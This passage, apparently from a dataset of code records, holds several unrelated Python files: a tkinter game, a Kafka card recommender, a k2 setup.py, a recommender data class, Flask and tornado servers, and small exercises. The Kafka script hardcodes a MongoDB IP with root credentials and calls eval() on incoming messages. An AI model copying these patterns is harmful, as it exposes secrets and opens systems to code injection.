canvas.create_image(170,77, image=img33)\r\n canvas.place(x=30, y=80)\r\n\r\n# boutons\r\n\r\nimage_chisel = tk.PhotoImage(file=os.path.join(dirname, \"assets/chisel.png\"))\r\nbutton_chisel = tk.Button(window, image=image_chisel, width=100, height=100, command=choose_chisel)\r\nbutton_chisel.place(x=270, y=270)\r\n\r\nimage_leaf = tk.PhotoImage(file=os.path.join(dirname, \"assets/leaf.png\"))\r\nbutton_leaf = tk.Button(window, image=image_leaf, width=100, height=100, command=choose_leaf)\r\nbutton_leaf.place(x=150, y=270)\r\n\r\nimage_pierre = tk.PhotoImage(file=os.path.join(dirname, \"assets/pierre.png\"))\r\nbutton_pierre = tk.Button(window, image=image_pierre, width=100, height=100, command=choose_pierre)\r\nbutton_pierre.place(x=30, y=270)\r\n\r\n# bienvenue\r\n\r\nlabel_choose_weapon = tk.Label(window, text=\"Choose your weapon :\", bg=\"#7FD7DF\")\r\nlabel_choose_weapon.place(x=135, y=221)\r\n\r\nlabel_welcome = tk.Label(window, text=\"Welcome !\", bg=\"#7FD7DF\", font=(\"Helvetica\", 30, \"italic bold\"), fg='white')\r\nlabel_welcome.place(x=103, y=110)\r\n\r\nwindow.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"558381389","text":"import pandas as pd\nimport json\nimport re\nimport pymongo\nimport jieba\nimport operator\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport uuid\nfrom confluent_kafka import Consumer\n\n\nclient = pymongo.MongoClient(host='123.241.175.34', port=27017)\nclient.admin.authenticate('root','1qaz@WSX3edc')\ndb = client.Recommend_card\ncoll = db.no_card\nmondata = list(coll.find())\ncard_df = pd.DataFrame(mondata)\ncard_df.set_index('卡名', inplace=True)\ndel card_df['_id']\nprops = {'bootstrap.servers': 'kafka:9092', 'group.id': 'test3', 'auto.offset.reset': 'earliest',\n 'session.timeout.ms': 6000}\nconsumer = Consumer(props)\ntopicName = \"nocard\"\nconsumer.subscribe([topicName])\nwhile True:\n records = consumer.consume()\n if records is None:\n continue\n else:\n for record in records:\n msgKey = record.key().decode('utf-8')\n msgValue = record.value().decode('utf-8')\n data = eval(msgValue)\n id = data[\"id\"]\n a = data[\"卡活動\"]\n b = data[\"保險\"]\n c = data[\"加油\"]\n d = data[\"行動支付\"]\n e = data[\"超商\"]\n f = data[\"交通\"]\n g = data[\"電影\"]\n h = data[\"旅遊機票飯店\"]\n i = data[\"網購\"]\n j = data[\"繳稅繳費\"]\n k = data[\"現金回饋\"]\n list01 = [a, b, c, d, e, f, g, h, i, j, k]\n for n, i in enumerate(list01):\n if i == '':\n list01[n] = 0\n else:\n list01[n] = int(i)\n INP = pd.DataFrame(columns=['卡活動', '保險', '加油', '行動支付', '超商', '交通', '電影', '旅遊機票飯店', '網購', '繳稅繳費', '現金回饋'])\n list02 = []\n if sum(list01) == 0:\n list02 = [0] * len(INP.columns)\n INP.loc[0] = list02\n\n else:\n for i in list01:\n l02 = i / sum(list01)\n list02.append(l02)\n INP.loc[0] = list02\n # 計算相似度\n x = cosine_similarity(card_df, INP)\n # print(x)\n a = list(x)\n b = sorted(a, reverse=True)\n blist = b[0:3]\n blist\n c = []\n if sum(blist) == 0:\n print(card_df.index[[12, 77, 101]])\n result = {\"id\": id, \"card1\": card_df.index[12], \"card2\": card_df.index[77], \"card3\": card_df.index[101]}\n coll2 = db.no_card_result\n coll2.insert_one(result)\n client.close()\n else:\n for i in blist:\n d = a.index(i)\n c.append(d)\n print(list(card_df.index[c]))\n card = list(card_df.index[c])\n result = {\"id\": id, \"card1\": card[0], \"card2\": card[1], \"card3\": card[2]}\n coll2 = db.no_card_result\n coll2.insert_one(result)\n client.close()\n","sub_path":"linechatbot/flask/nocard.py","file_name":"nocard.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"123796830","text":"# Welcome to the k2 setup.py.\n#\n# Please follow instructions in scripts/build_pip.sh to use this file.\n#\nimport datetime\nimport re\nimport setuptools\nimport sys\n\nif sys.version_info < (3,):\n print('Python 2 has reached end-of-life and is no longer supported by k2.')\n sys.exit(-1)\n\nif sys.version_info < (3, 6):\n print('Python 3.5 has reached end-of-life on September 13th, 2020 '\n 'and is no longer supported by k2.')\n sys.exit(-1)\n\n# Refer to https://stackoverflow.com/questions/45150304/how-to-force-a-python-wheel-to-be-platform-specific-when-building-it\n# for why to introduce `bdist_wheel`.\n#\n# With `bdist_wheel`, the final wheel name looks like `k2-0.0.1.dev20201104-cp37-cp37m-linux_x86_64.whl`\ntry:\n from wheel.bdist_wheel import bdist_wheel as _bdist_wheel\n\n class bdist_wheel(_bdist_wheel):\n\n def finalize_options(self):\n _bdist_wheel.finalize_options(self)\n self.root_is_pure = False\nexcept ImportError:\n bdist_wheel = None\n\n\ndef get_long_description():\n with open('README.md', 'r') as f:\n long_description = f.read()\n return long_description\n\n\ndef get_cuda_version():\n import torch\n from torch.utils import collect_env\n running_cuda_version = collect_env.get_running_cuda_version(\n collect_env.run)\n cuda_version = torch.version.cuda\n if running_cuda_version is not None:\n assert cuda_version in running_cuda_version, \\\n f'PyTorch is built with CUDA version: {cuda_version}.\\n' \\\n f'The current running CUDA version is: {running_cuda_version}'\n cuda_version = cuda_version.split('.')\n major, minor = int(cuda_version[0]), int(cuda_version[1])\n cuda_version = major * 10 + minor\n return f'{cuda_version}'\n\n\ndef get_package_version():\n # Set a default CUDA version here so that `pip install k2`\n # uses the default CUDA version.\n #\n # `pip install k2==x.x.x+cu100` to install k2 with CUDA 10.0\n #\n default_cuda_version = '101' # CUDA 10.1\n cuda_version = get_cuda_version()\n if default_cuda_version != cuda_version:\n cuda_version = f'+cu{cuda_version}'\n else:\n cuda_version = ''\n\n with open('CMakeLists.txt') as f:\n content = f.read()\n\n latest_version = re.search(r'set\\(K2_VERSION (.*)\\)', content).group(1)\n latest_version = latest_version.strip('\"')\n\n dt = datetime.datetime.utcnow()\n package_version = f'{latest_version}{cuda_version}.dev{dt.year}{dt.month:02d}{dt.day:02d}'\n return package_version\n\n\ndef get_short_description():\n return 'FSA/FST algorithms, intended to (eventually) be interoperable with PyTorch and similar'\n\n\nwith open('k2/python/k2/__init__.py', 'a') as f:\n f.write(f\"__dev_version__ = '{get_package_version()}'\\n\")\n\ndev_requirements = [\n 'clang-format==9.0.0',\n 'flake8==3.8.3',\n 'yapf==0.27.0',\n]\n\nsetuptools.setup(\n python_requires='>=3.6',\n name='k2',\n version=get_package_version(),\n author='Daniel Povey',\n author_email='dpovey@gmail.com',\n keywords='k2, FSA, FST',\n description=get_short_description(),\n long_description=get_long_description(),\n long_description_content_type='text/markdown',\n url='https://github.com/k2-fsa/k2',\n package_dir={\n 'k2': 'k2/python/k2',\n 'k2.ragged': 'k2/python/k2/ragged',\n 'k2.sparse': 'k2/python/k2/sparse',\n },\n packages=['k2', 'k2.ragged', 'k2.sparse'],\n install_requires=['torch', 'graphviz'],\n extras_require={'dev': dev_requirements},\n data_files=[('', ['LICENSE'])],\n cmdclass={'bdist_wheel': bdist_wheel},\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: C++',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence',\n 'Operating System :: OS Independent',\n ],\n)\n\n# remove the line __dev_version__ from k2/python/k2/__init__.py\nwith open('k2/python/k2/__init__.py', 'r') as f:\n lines = f.readlines()\n\nwith open('k2/python/k2/__init__.py', 'w') as f:\n for line in lines:\n if '__dev_version__' not in line:\n f.write(line)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"164771107","text":"ncolums = 2\nnfilas = 4\nmatriz = [[0] * ncolums for i in range(nfilas)]\nmatriz[0][0] = \"Pera\"\nmatriz[0][1] = \"Manzana\"\nmatriz[1][0] = \"Naranja\"\nmatriz[1][1] = \"Fresa\"\nmatriz[2][0] = \"Patilla\"\nmatriz[2][1] = \"Uva\"\nmatriz[3][0] = \"Mandarina\"\nmatriz[3][1] = \"Kiwi\"\n\nprint(matriz)","sub_path":"matrizprueba.py","file_name":"matrizprueba.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"346130256","text":"from base64 import *\r\n\r\n# we have 'a' as multiple line string\r\na = '''\r\n\r\nhello\r\n\r\n''' # string ended here\r\n\r\na = str.encode(a) # string to byte-like object\r\na = b64encode(a) # b64 encoded\r\n\r\nprint('encoded: ',a)\r\n\r\na = b64decode(a) # b64 decoded\r\na = a.decode() # byte-like object to string\r\n\r\nprint('decoded: ',a)\r\n\r\n\r\n","sub_path":"encoding-multiple-lines.py","file_name":"encoding-multiple-lines.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"77171433","text":"from array import array\nfrom collections import defaultdict, namedtuple\nimport inspect\nimport json\nimport os\nimport numpy as np\nimport pandas as pd\n\n\nFeature = namedtuple(\"Feature\", [\"name\", \"index\"])\nEmpty_Feature = Feature(name=[], index=[])\n\n\nclass DataInfo(object):\n def __init__(\n self,\n col_name_mapping=None,\n interaction_data=None,\n user_sparse_unique=None,\n user_dense_unique=None,\n item_sparse_unique=None,\n item_dense_unique=None,\n user_indices=None,\n item_indices=None\n ):\n self.col_name_mapping = col_name_mapping\n self.interaction_data = interaction_data\n self.user_sparse_unique = user_sparse_unique\n self.user_dense_unique = user_dense_unique\n self.item_sparse_unique = item_sparse_unique\n self.item_dense_unique = item_dense_unique\n self.user_consumed, self.item_consumed = DataInfo.interaction_consumed(\n user_indices, item_indices\n )\n self._user2id = None\n self._item2id = None\n self._id2user = None\n self._id2item = None\n self.all_args = locals()\n\n @staticmethod\n def interaction_consumed(user_indices, item_indices):\n user_consumed = defaultdict(lambda: array(\"I\"))\n item_consumed = defaultdict(lambda: array(\"I\"))\n for u, i in zip(user_indices, item_indices):\n user_consumed[u].append(i)\n item_consumed[i].append(u)\n return user_consumed, item_consumed\n\n @property\n def global_mean(self):\n return self.interaction_data.label.mean()\n\n @property\n def min_max_rating(self):\n return (\n self.interaction_data.label.min(),\n self.interaction_data.label.max()\n )\n\n @property\n def sparse_col(self):\n if not self.col_name_mapping[\"sparse_col\"]:\n return Empty_Feature\n return Feature(\n name=list(self.col_name_mapping[\"sparse_col\"].keys()),\n index=list(self.col_name_mapping[\"sparse_col\"].values())\n )\n\n @property\n def dense_col(self):\n if not self.col_name_mapping[\"dense_col\"]:\n return Empty_Feature\n return Feature(\n name=list(self.col_name_mapping[\"dense_col\"].keys()),\n index=list(self.col_name_mapping[\"dense_col\"].values())\n )\n\n @property\n def user_sparse_col(self):\n if not self.col_name_mapping[\"user_sparse_col\"]:\n return Empty_Feature\n return Feature(\n name=list(self.col_name_mapping[\"user_sparse_col\"].keys()),\n index=list(self.col_name_mapping[\"user_sparse_col\"].values())\n )\n\n @property\n def user_dense_col(self):\n if not self.col_name_mapping[\"user_dense_col\"]:\n return Empty_Feature\n return Feature(\n name=list(self.col_name_mapping[\"user_dense_col\"].keys()),\n index=list(self.col_name_mapping[\"user_dense_col\"].values())\n )\n\n @property\n def item_sparse_col(self):\n if not self.col_name_mapping[\"item_sparse_col\"]:\n return Empty_Feature\n return Feature(\n name=list(self.col_name_mapping[\"item_sparse_col\"].keys()),\n index=list(self.col_name_mapping[\"item_sparse_col\"].values())\n )\n\n @property\n def item_dense_col(self):\n if not self.col_name_mapping[\"item_dense_col\"]:\n return Empty_Feature\n return Feature(\n name=list(self.col_name_mapping[\"item_dense_col\"].keys()),\n index=list(self.col_name_mapping[\"item_dense_col\"].values())\n )\n\n @property\n def user_col(self):\n # will be sorted by key\n return (\n self.col_name_mapping[\"user_sparse_col\"].keys().__or__(\n self.col_name_mapping[\"user_dense_col\"].keys())\n )\n\n @property\n def item_col(self):\n # will be sorted by key\n return (\n self.col_name_mapping[\"item_sparse_col\"].keys().__or__(\n self.col_name_mapping[\"item_dense_col\"].keys())\n )\n\n @property\n def n_users(self):\n return self.interaction_data.user.nunique()\n\n @property\n def n_items(self):\n return self.interaction_data.item.nunique()\n\n @property\n def user2id(self):\n if self._user2id is None:\n unique = np.unique(self.interaction_data[\"user\"])\n self._user2id = dict(zip(unique, range(self.n_users)))\n self._user2id[-1] = len(unique) # -1 represent new user\n return self._user2id\n\n @property\n def item2id(self):\n if self._item2id is None:\n unique = np.unique(self.interaction_data[\"item\"])\n self._item2id = dict(zip(unique, range(self.n_items)))\n self._item2id[-1] = len(unique) # -1 represent new item\n return self._item2id\n\n @property\n def id2user(self):\n if self._id2user is None:\n self._id2user = {j: user for user, j in self.user2id.items()}\n return self._id2user\n\n @property\n def id2item(self):\n if self._id2item is None:\n self._id2item = {j: item for item, j in self.item2id.items()}\n return self._id2item\n\n def __repr__(self):\n n_users = self.n_users\n n_items = self.n_items\n n_labels = len(self.interaction_data)\n return \"n_users: %d, n_items: %d, data sparsity: %.4f %%\" % (\n n_users, n_items, 100 * n_labels / (n_users*n_items)\n )\n\n def get_indexed_interaction(self):\n data = self.interaction_data.copy()\n data.user = data.user.map(self.user2id)\n data.item = data.item.map(self.item2id)\n if data.user.isnull().any():\n data[\"user\"].fillna(self.n_users, inplace=True)\n data[\"user\"] = data[\"user\"].astype(\"int\")\n if data.item.isnull().any():\n data[\"item\"].fillna(self.n_items, inplace=True)\n data[\"item\"] = data[\"item\"].astype(\"int\")\n return data\n\n def save(self, path):\n if not os.path.isdir(path):\n print(f\"file folder {path} doesn't exists, creating a new one...\")\n os.makedirs(path)\n name_mapping_path = os.path.join(path, \"data_info_name_mapping.json\")\n with open(name_mapping_path, 'w') as f:\n json.dump(self.all_args[\"col_name_mapping\"],\n f, separators=(',', ':'))\n\n other_path = os.path.join(path, \"data_info\")\n hparams = dict()\n arg_names = inspect.signature(self.__init__).parameters.keys()\n for arg in arg_names:\n if arg == \"col_name_mapping\" or self.all_args[arg] is None:\n continue\n if arg == \"interaction_data\":\n hparams[arg] = self.all_args[arg].to_numpy()\n else:\n hparams[arg] = self.all_args[arg]\n\n np.savez_compressed(other_path, **hparams)\n\n # noinspection PyTypeChecker\n @classmethod\n def load(cls, path):\n if not os.path.exists(path):\n raise OSError(f\"file folder {path} doesn't exists...\")\n\n hparams = dict()\n name_mapping_path = os.path.join(path, \"data_info_name_mapping.json\")\n with open(name_mapping_path, 'r') as f:\n hparams[\"col_name_mapping\"] = json.load(f)\n\n other_path = os.path.join(path, \"data_info.npz\")\n info = np.load(other_path)\n for arg in info:\n if arg == \"interaction_data\":\n hparams[arg] = pd.DataFrame(\n info[arg], columns=[\"user\", \"item\", \"label\"])\n else:\n hparams[arg] = info[arg]\n\n return cls(**hparams)\n","sub_path":"libreco/data/data_info.py","file_name":"data_info.py","file_ext":"py","file_size_in_byte":7659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"105427776","text":"import tornado.ioloop\nimport tornado.web\nimport json\nimport handler\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.write(\"Hello, world\")\n self.write('ok')\n\n def post(self):\n data = json.loads(self.request.body, encoding='utf-8')\n self.write('ok')\n handler.handler(data)\n\n\nif __name__ == \"__main__\":\n application = tornado.web.Application([\n (r\"/\", MainHandler),\n ])\n application.listen(50383)\n tornado.ioloop.IOLoop.current().start()\n","sub_path":"messages/messages_server.py","file_name":"messages_server.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"228086557","text":"# ../listeners/tick/delays.py\n\n\"\"\"Provides delay functionality using a tick listener.\"\"\"\n\n# =============================================================================\n# >> IMPORTS\n# =============================================================================\n# Python Imports\n# Time\nimport time\n\n# Source.Python Imports\n# Hooks\nfrom hooks.exceptions import except_hooks\n# Listeners\nfrom listeners import tick_listener_manager\nfrom listeners import listeners_logger\n\n\n# =============================================================================\n# >> GLOBAL VARIABLES\n# =============================================================================\n# Get the sp.tick.delays logger\nlisteners_tick_delays_logger = listeners_logger.tick.delays\n\n\n# =============================================================================\n# >> CLASSES\n# =============================================================================\nclass Delay(object):\n\n \"\"\"Stores a callback to be called at a later time.\"\"\"\n\n def __init__(self, seconds, callback, *args, **kwargs):\n \"\"\"Called when an instance is instantiated.\"\"\"\n # Log the init message\n listeners_tick_delays_logger.log_debug(\n 'Delay.__init__ <{0}> <{1}> <{2}> <{3}>'.format(\n seconds, callback, args, kwargs))\n\n # Store the time to execute the callback\n self._exec_time = time.time() + seconds\n\n # Store the callback, arguments, and keywords\n self.callback = callback\n self.args = args\n self.kwargs = kwargs\n\n def __call__(self):\n \"\"\"Call the delay with the proper arguments and keywords.\"\"\"\n # Log the call message\n listeners_tick_delays_logger.log_debug(\n 'Delay.__call__ - Try to call - <{0}> <{1}> <{2}>'.format(\n self.callback, self.args, self.kwargs))\n\n # Use try/except in case an error is encountered\n try:\n\n # Execute the callback with the arguments and keywords\n self.callback(*self.args, **self.kwargs)\n\n # Was an error encountered?\n except:\n\n # Print the exception to the console\n except_hooks.print_exception()\n\n @property\n def exec_time(self):\n \"\"\"Return the time to execute the delayed function.\"\"\"\n return self._exec_time\n\n def cancel(self):\n \"\"\"Cancel the delay.\"\"\"\n tick_delays.cancel_delay(self)\n\n\nclass _Times(list):\n\n \"\"\"List class used to store delays to be called.\"\"\"\n\n def call_delays(self):\n \"\"\"Call the delays in the list.\"\"\"\n # Loop through the delays in the list\n for item in self:\n\n # Call the delay\n item()\n\n\nclass _TickDelays(dict):\n\n \"\"\"Class used to store delays to be called by a tick listener.\"\"\"\n\n def __init__(self):\n \"\"\"Store an ordered list to sort delays.\"\"\"\n super(_TickDelays, self).__init__()\n self._order = list()\n\n def __missing__(self, item):\n \"\"\"Called when first adding a time to the dictionary.\"\"\"\n # Log the missing message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.__missing__ <{0}>'.format(item))\n\n # Is the tick listener registered?\n if not self:\n\n # Log the tick listener registration message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays - Registering Tick Listener')\n\n # Register the tick listener\n tick_listener_manager.register_listener(self._tick)\n\n # Add the item to the dictionary as a _Times instance\n self[item] = _Times()\n\n # Add the time to the ordered list\n self._order.append(item)\n\n # Sort the ordered list\n self._order.sort()\n\n # Return the item's instance\n return self[item]\n\n def __iter__(self):\n \"\"\"Loop through the ordered list.\"\"\"\n # Loop through each item in the ordered list\n for item in self._order:\n\n # Yield the item\n yield item\n\n def __delitem__(self, item):\n \"\"\"Call the delays and remove the time from the ordered list.\"\"\"\n # Log the delitem message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.__delitem__ <{0}>'.format(item))\n\n # Is the item in the dictionary?\n if item not in self:\n\n # Log the not in self message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.__delitem__ - Item not in dictionary')\n\n # If not, simply return\n return\n\n # Call all delays for the given item\n self[item].call_delays()\n\n # Remove the item from the ordered list\n self._order.remove(item)\n\n # Remove the item from the dictionary\n super(_TickDelays, self).__delitem__(item)\n\n def delay(self, seconds, callback, *args, **kwargs):\n \"\"\"Create a delay.\"\"\"\n # Get the Delay instance for the given arguments\n delay_object = Delay(seconds, callback, *args, **kwargs)\n\n # Add the Delay instance to the dictionary using its execution time\n self[delay_object._exec_time].append(delay_object)\n\n # Return the object\n return delay_object\n\n def _tick(self):\n \"\"\"Called every tick when the listener is registered.\"\"\"\n # Get the current time\n current_time = time.time()\n\n # Loop through each item in the ordered list\n for item in self:\n\n # Should the delays be called?\n if item > current_time:\n\n # If not, no need to continue looping\n break\n\n # Remove the item from the dictionary\n del self[item]\n\n # Is the dictionary now empty?\n if not self:\n\n # Log the tick listener unregistering message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays._tick - Unregistering Tick Listener')\n\n # Unregister the tick listener\n tick_listener_manager.unregister_listener(self._tick)\n\n def cancel_delay(self, delay_object):\n \"\"\"Cancel a delay.\"\"\"\n # Log the canceling message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.cancel_delay <{0}>'.format(delay_object))\n\n # Is the given argument a Delay object?\n if not isinstance(delay_object, Delay):\n\n # If not, raise an error\n raise TypeError(\n 'tick_delays.cancel_delay requires a Delay instance.')\n\n # Is the given Delay object's time no longer in the dictionary?\n if delay_object._exec_time not in self:\n\n # If not, raise an error\n raise KeyError('Object is no longer registered.')\n\n # Log the removing from list message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.cancel_delay - Removing from '\n '<{0}>'.format(delay_object._exec_time))\n\n # Remove the delay from its time\n self[delay_object._exec_time].remove(delay_object)\n\n # Does the delay's time have any remaining objects?\n if not self[delay_object._exec_time]:\n\n # Log the deletion of the time from the dictionary message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.cancel_delay - Removing <{0}> '\n 'from dictionary'.format(delay_object._exec_time))\n\n # If not, remove the delay's time from the dictionary\n del self[delay_object._exec_time]\n\n # Are there any remaining delays?\n if not self:\n\n # Log the tick listener unregistering message\n listeners_tick_delays_logger.log_debug(\n 'tick_delays.cancel_delay - Unregistering Tick Listener')\n\n # Unregister the listener\n tick_listener_manager.unregister_listener(self._tick)\n\n# Get the _TickDelays instance\ntick_delays = _TickDelays()\n","sub_path":"addons/source-python/packages/source-python/listeners/tick/delays.py","file_name":"delays.py","file_ext":"py","file_size_in_byte":7905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"186587948","text":"# test the pre-trained model on a single video\n# (working on it)\n# Bolei Zhou\n\nimport argparse\nimport time\n\nimport numpy as np\nimport torch.nn.parallel\nimport torch.optim\nfrom sklearn.metrics import confusion_matrix\nfrom dataset import TSNDataSet\nfrom models import TSN\nfrom transforms import *\nfrom ops import ConsensusModule\nimport datasets_video\nimport pdb\nfrom torch.nn import functional as F\n\n\n# options\nparser = argparse.ArgumentParser(\n description=\"test TRN on a single video\")\nparser.add_argument('dataset', type=str, choices=['something','jester','moments','charades'])\nparser.add_argument('modality', type=str, choices=['RGB', 'Flow', 'RGBDiff'])\nparser.add_argument('weights', type=str)\nparser.add_argument('--arch', type=str, default=\"resnet101\")\nparser.add_argument('--save_scores', type=str, default=None)\nparser.add_argument('--test_segments', type=int, default=25)\nparser.add_argument('--max_num', type=int, default=-1)\nparser.add_argument('--test_crops', type=int, default=10)\nparser.add_argument('--input_size', type=int, default=224)\nparser.add_argument('--crop_fusion_type', type=str, default='TRN',\n choices=['avg', 'TRN','TRNmultiscale'])\nparser.add_argument('-j', '--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--gpus', nargs='+', type=int, default=None)\nparser.add_argument('--img_feature_dim',type=int, default=256)\nparser.add_argument('--num_set_segments',type=int, default=1,help='TODO: select multiply set of n-frames from a video')\nparser.add_argument('--softmax', type=int, default=0)\n\nargs = parser.parse_args()\n\n\nnet = TSN(num_class, args.test_segments if args.crop_fusion_type in ['TRN','TRNmultiscale'] else 1, args.modality,\n base_model=args.arch,\n consensus_type=args.crop_fusion_type,\n img_feature_dim=args.img_feature_dim,\n )\n\ncheckpoint = torch.load(args.weights)\nprint(\"model epoch {} best prec@1: {}\".format(checkpoint['epoch'], checkpoint['best_prec1']))\n\nbase_dict = {'.'.join(k.split('.')[1:]): v for k,v in list(checkpoint['state_dict'].items())}\nnet.load_state_dict(base_dict)\n\nif args.test_crops == 1:\n cropping = torchvision.transforms.Compose([\n GroupScale(net.scale_size),\n GroupCenterCrop(net.input_size),\n ])\nelif args.test_crops == 10:\n cropping = torchvision.transforms.Compose([\n GroupOverSample(net.input_size, net.scale_size)\n ])\nelse:\n raise ValueError(\"Only 1 and 10 crops are supported while we got {}\".format(args.test_crops))\n\n# too lazy to continue...(#,#!)\n","sub_path":"test_video.py","file_name":"test_video.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"519565380","text":"#!/usr/bin/env python3.8\n\n'''\nUsuário escolhe o que deseja calcular entre cateto ou hipotenusa e programa retorna o valor escolhido. \nCom validação dos dados.\n'''\n\n#importando o módulo de informações sobre o sistema\nimport sys\n#adicionando ao final da lista de módulos o caminho para os meus módulos\nsys.path.append('/home/danielle8farias/hello-world-python3/meus_modulos')\n#importando módulos de auxílio\nfrom mensagem import ler_cabecalho, rodape, linha, ler_resposta\n#importando módulo de raiz quadrada\nfrom math import sqrt, hypot\n#importando módulos de números\nfrom numeros import ler_num_float\n\n#função que calcula a hipotenusa\ndef calcular_cateto(a, b):\n #chamada da função sqrt que calcula a raiz quadrada\n # **2 elevado ao quadrado \n # ou pow(base, potência)\n c = sqrt(a**2 - pow(b, 2))\n #retorno da função \n return c\n\n\n#função que verifica a validade da escolha\ndef ler_escolha(num):\n #laço\n while True:\n try:\n #input() captura como string o que for digitado\n #int() convertendo a string recebida para tipo inteiro\n #atribuindo valor à variável 'escolha'\n escolha = int(input(num))\n #verificando se a escolha é diferente de 1 ou 2\n if escolha != 1 and escolha != 2:\n #criando exceção\n raise Exception('Escolha 1 ou 2.')\n #caso seja digitado espaços ou ENTER\n #variável 'erro' retorna a mensagem da exceção\n except ValueError:\n #print() retorna uma string na tela\n print('Digite um número.')\n #volta para o início do laço\n continue\n #chama a exceção criada\n except Exception as erro:\n #print(f'') retorna uma string formatada na tela\n print(f'Valor inválido: {erro}')\n continue\n #se o 'try' for válido \n else:\n return escolha\n\n\n#programa principal\n#chamada que lê a função cabeçalho\nler_cabecalho('hipotenusa')\nwhile True:\n print('Digite:')\n print('1 para Hipotenusa')\n print('2 para Cateto')\n #função print() vazia não retorna nada; apenas pula uma linha\n print()\n #validar resposta\n #atribui a variável 'escolha' o retorno da função\n escolha = ler_escolha('O que deseja calcular? ')\n print()\n if escolha == 1:\n b = ler_num_float('Digite o 1º Cateto: ')\n c = ler_num_float('Digite o 2º Cateto: ')\n #a = sqrt(b**2 + c**2)\n a = hypot(b, c)\n print(f'O valor da Hipotenusa é: {a:.2f}')\n else:\n a = ler_num_float('Digite a Hipotenusa: ')\n b = ler_num_float('Digite o Cateto: ')\n c = calcular_cateto(a, b)\n print(f'O valor do outro Cateto é: {c:.2f}')\n print()\n #chamada da função que lê a resposta\n resposta = ler_resposta('Deseja continuar? [S/N]')\n print()\n #verificando se variável 'reposta' é igual a string N\n if resposta == 'N':\n #quebrando o laço\n break\n else:\n #chamada da função linha\n linha()\n print()\n#chamada da função rodapé\nrodape()\n","sub_path":"exercicio_py/ex0081_hipotenusa.py","file_name":"ex0081_hipotenusa.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"202440087","text":"# Implementar la funcion buscar_persona, que devuelve el registro de una persona basado en su id.\n# El return es una tupla que contiene sus campos: id, nombre, nacimiento, dni y altura.\n# Si no encuentra ningun registro, devuelve False.\n\nimport datetime\nimport sqlite3\n\nfrom practico_03.ejercicio_01 import reset_tabla\nfrom practico_03.ejercicio_02 import agregar_persona\n\n\ndef buscar_persona(id_persona):\n db = sqlite3.connect('mibase')\n cursor = db.cursor()\n sel = cursor.execute(\"SELECT IdPersona, Nombre, FechaNacimiento, DNI, Altura FROM Persona WHERE IdPersona = ?\",(id_persona,))\n persona = sel.fetchone()\n db.commit()\n db.close()\n if persona:\n return persona\n else:\n return False\n\n\n@reset_tabla\ndef pruebas():\n juan = buscar_persona(agregar_persona('juan perez', datetime.datetime(1988, 5, 15), 32165498, 180))\n assert juan == (1, 'juan perez', str(datetime.datetime(1988, 5, 15)), 32165498, 180)\n assert buscar_persona(12345) is False\n\nif __name__ == '__main__':\n pruebas()\n","sub_path":"practico_03/ejercicio_04.py","file_name":"ejercicio_04.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"85073259","text":"\n# importing the necessary dependencies\nfrom flask import Flask, render_template, request,jsonify\nfrom flask_cors import CORS,cross_origin\nimport pickle\n\napp = Flask(__name__) # initializing a flask app\n\n@app.route('/',methods=['GET']) # route to display the home page\n@cross_origin()\ndef homePage():\n return render_template(\"index.html\")\n\n@app.route('/predict',methods=['POST','GET']) # route to show the predictions in a web UI\n@cross_origin()\ndef index():\n if request.method == 'POST':\n try:\n #'avg_rss12', 'var_rss12', 'avg_rss13', 'var_rss13', 'avg_rss23','var_rss23'\n # reading the inputs given by the user\n avg12=float(request.form['avg_rss12'])\n var12 = float(request.form['var_rss12'])\n avg13 = float(request.form['avg_rss13'])\n var13 = float(request.form['var_rss13'])\n avg23 = float(request.form['avg_rss23'])\n var23 = float(request.form['var_rss23'])\n filename = 'Logistic_Regression_model.pickle'\n loaded_model = pickle.load(open(filename, 'rb')) # loading the model file from the storage\n # predictions using the loaded model file\n prediction=loaded_model.predict([[avg12,var12,avg13,var13,avg23,var23]])\n print('prediction is', prediction)\n res = numbers_to_strings(prediction[0])\n # showing the prediction results in a UI\n return render_template('results.html',prediction=res)\n except Exception as e:\n print('The Exception message is: ',e)\n return 'something is wrong'\n # return render_template('results.html')\n else:\n return render_template('index.html')\n\n\n# Function to convert number into string\n# Switcher is dictionary data type here\ndef numbers_to_strings(argument):\n switcher = {\n 0: \"Bending Type 1\",\n 1: 